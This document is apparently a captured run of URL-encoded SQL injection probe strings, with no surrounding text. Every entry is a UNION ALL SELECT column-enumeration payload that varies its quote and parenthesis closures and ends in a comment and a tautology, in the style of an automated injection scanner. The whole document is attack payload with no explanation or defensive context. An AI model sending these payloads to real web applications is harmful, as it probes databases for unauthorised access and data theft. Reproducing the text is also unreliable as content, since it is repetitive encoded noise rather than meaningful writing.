-9106%27%29%29%29%20UNION%20ALL%20SELECT%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493--%20%20AND%20%28%28%28%27vJPR%27%20LIKE%20%27vJPR -4214%27%20UNION%20ALL%20SELECT%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744%2C%203744--%20%20AND%20%27EsxI%27%20LIKE%20%27EsxI -8176%27%20UNION%20ALL%20SELECT%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021%2C%207021--%20%20AND%20%27GxUP%27%20LIKE%20%27GxUP -7284%27%20UNION%20ALL%20SELECT%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853%2C%205853--%20%20AND%20%27xMqv%27%20LIKE%20%27xMqv -3311%27%20UNION%20ALL%20SELECT%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651%2C%201651--%20%20AND%20%27SVYR%27%20LIKE%20%27SVYR -7438%27%20UNION%20ALL%20SELECT%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785%2C%204785--%20%20AND%20%27CRMB%27%20LIKE%20%27CRMB -9607%27%20UNION%20ALL%20SELECT%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610--%20%20AND%20%27rCKe%27%20LIKE%20%27rCKe -4968%27%20UNION%20ALL%20SELECT%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984--%20%20AND%20%27gPvN%27%20LIKE%20%27gPvN -1286%27%20UNION%20ALL%20SELECT%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300%2C%208300--%20%20AND%20%27SnoO%27%20LIKE%20%27SnoO -1817%27%20UNION%20ALL%20SELECT%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724--%20%20AND%20%27XQzR%27%20LIKE%20%27XQzR -2589%27%20UNION%20ALL%20SELECT%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339--%20%20AND%20%27BpVw%27%20LIKE%20%27BpVw -1738%22%29%20UNION%20ALL%20SELECT%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737%2C%204737--%20%20AND%20%28%22sDHl%22%3D%22sDHl -7759%22%29%20UNION%20ALL%20SELECT%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679--%20%20AND%20%28%22MoTf%22%3D%22MoTf -3135%22%29%20UNION%20ALL%20SELECT%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696--%20%20AND%20%28%22eJuD%22%3D%22eJuD -7795%22%29%20UNION%20ALL%20SELECT%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544--%20%20AND%20%28%22gdkm%22%3D%22gdkm -1401%22%29%20UNION%20ALL%20SELECT%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261%2C%207261--%20%20AND%20%28%22CdjF%22%3D%22CdjF -8289%22%29%20UNION%20ALL%20SELECT%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096--%20%20AND%20%28%22YBaI%22%3D%22YBaI -3201%22%29%20UNION%20ALL%20SELECT%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629%2C%205629--%20%20AND%20%28%22PQKu%22%3D%22PQKu -2639%22%29%20UNION%20ALL%20SELECT%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438--%20%20AND%20%28%22MJlL%22%3D%22MJlL -2515%22%29%20UNION%20ALL%20SELECT%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514--%20%20AND%20%28%22kqjj%22%3D%22kqjj -8448%22%29%20UNION%20ALL%20SELECT%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227--%20%20AND%20%28%22pmdC%22%3D%22pmdC -8355%22%29%29%20UNION%20ALL%20SELECT%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739%2C%206739--%20%20AND%20%28%28%22cnPG%22%3D%22cnPG -8032%22%29%29%20UNION%20ALL%20SELECT%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774%2C%208774--%20%20AND%20%28%28%22cXTf%22%3D%22cXTf -7892%22%29%29%20UNION%20ALL%20SELECT%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281--%20%20AND%20%28%28%22HCia%22%3D%22HCia -3335%22%29%29%20UNION%20ALL%20SELECT%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582--%20%20AND%20%28%28%22Mknp%22%3D%22Mknp -4669%22%29%29%20UNION%20ALL%20SELECT%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070%2C%204070--%20%20AND%20%28%28%22qzvk%22%3D%22qzvk -2194%22%29%29%20UNION%20ALL%20SELECT%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509--%20%20AND%20%28%28%22kwBt%22%3D%22kwBt -2614%22%29%29%20UNION%20ALL%20SELECT%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836%2C%208836--%20%20AND%20%28%28%22vagg%22%3D%22vagg -8207%22%29%29%20UNION%20ALL%20SELECT%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839--%20%20AND%20%28%28%22CzTn%22%3D%22CzTn -7146%22%29%29%20UNION%20ALL%20SELECT%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813--%20%20AND%20%28%28%22ZFPi%22%3D%22ZFPi -9445%22%29%29%20UNION%20ALL%20SELECT%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655--%20%20AND%20%28%28%22DmVc%22%3D%22DmVc -8629%22%29%29%29%20UNION%20ALL%20SELECT%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975--%20%20AND%20%28%28%28%22JasQ%22%3D%22JasQ -8301%22%29%29%29%20UNION%20ALL%20SELECT%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074--%20%20AND%20%28%28%28%22bqrR%22%3D%22bqrR -8061%22%29%29%29%20UNION%20ALL%20SELECT%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496%2C%209496--%20%20AND%20%28%28%28%22FSwQ%22%3D%22FSwQ -5827%22%29%29%29%20UNION%20ALL%20SELECT%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775--%20%20AND%20%28%28%28%22aiXm%22%3D%22aiXm -6862%22%29%29%29%20UNION%20ALL%20SELECT%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961%2C%209961--%20%20AND%20%28%28%28%22Irtm%22%3D%22Irtm -1211%22%29%29%29%20UNION%20ALL%20SELECT%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646--%20%20AND%20%28%28%28%22AKys%22%3D%22AKys -4766%22%29%29%29%20UNION%20ALL%20SELECT%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040--%20%20AND%20%28%28%28%22aqxa%22%3D%22aqxa -6393%22%29%29%29%20UNION%20ALL%20SELECT%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994--%20%20AND%20%28%28%28%22vqNA%22%3D%22vqNA -7744%22%29%29%29%20UNION%20ALL%20SELECT%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713--%20%20AND%20%28%28%28%22WQkX%22%3D%22WQkX -2909%22%29%29%29%20UNION%20ALL%20SELECT%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682%2C%204682--%20%20AND%20%28%28%28%22BUHF%22%3D%22BUHF -8518%22%20UNION%20ALL%20SELECT%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979--%20%20AND%20%22PbTn%22%3D%22PbTn -9999%22%20UNION%20ALL%20SELECT%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755--%20%20AND%20%22HqIr%22%3D%22HqIr -3380%22%20UNION%20ALL%20SELECT%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698%2C%206698--%20%20AND%20%22puNA%22%3D%22puNA -2653%22%20UNION%20ALL%20SELECT%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218--%20%20AND%20%22DqgD%22%3D%22DqgD -1677%22%20UNION%20ALL%20SELECT%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715--%20%20AND%20%22joRF%22%3D%22joRF -4342%22%20UNION%20ALL%20SELECT%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724--%20%20AND%20%22OghB%22%3D%22OghB -3438%22%20UNION%20ALL%20SELECT%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117--%20%20AND%20%22VebH%22%3D%22VebH -1738%22%20UNION%20ALL%20SELECT%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993%2C%209993--%20%20AND%20%22msLD%22%3D%22msLD -5464%22%20UNION%20ALL%20SELECT%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885%2C%201885--%20%20AND%20%22iZhp%22%3D%22iZhp -9269%22%20UNION%20ALL%20SELECT%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537--%20%20AND%20%22mZBS%22%3D%22mZBS -9465%22%29%20UNION%20ALL%20SELECT%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625--%20%20AND%20%28%22XvSO%22%20LIKE%20%22XvSO -9983%22%29%20UNION%20ALL%20SELECT%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490%2C%203490--%20%20AND%20%28%22GlBB%22%20LIKE%20%22GlBB -4042%22%29%20UNION%20ALL%20SELECT%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806%2C%202806--%20%20AND%20%28%22ycEe%22%20LIKE%20%22ycEe -3414%22%29%20UNION%20ALL%20SELECT%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469%2C%206469--%20%20AND%20%28%22nGpY%22%20LIKE%20%22nGpY -7456%22%29%20UNION%20ALL%20SELECT%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660%2C%201660--%20%20AND%20%28%22jdJB%22%20LIKE%20%22jdJB -6154%22%29%20UNION%20ALL%20SELECT%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245--%20%20AND%20%28%22Timx%22%20LIKE%20%22Timx 